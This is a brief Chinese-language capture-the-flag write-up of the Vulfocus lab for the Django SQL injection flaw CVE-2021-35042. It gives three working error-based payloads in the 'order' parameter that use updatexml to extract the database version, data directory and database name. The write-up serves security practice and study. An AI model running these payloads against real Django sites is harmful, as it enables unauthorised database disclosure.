Vulfocus靶场 | Django SQL注入（CVE-2021-35042）

漏洞复现

这题通关比较简单，但是django这个漏洞还挺出名的，之前在ctf上也遇到过相关的题目\

 

直接按照提示，进入了Django报错页面

 

flag就在里面，直接ctrl+F就能找到

 

 

爆数据库版本

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%23

 

爆路径

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@datadir)),1)%23

 

 

数据库名

order=vuln_collection.id);select updatexml(1,concat(0x7e,(select database())),1)%23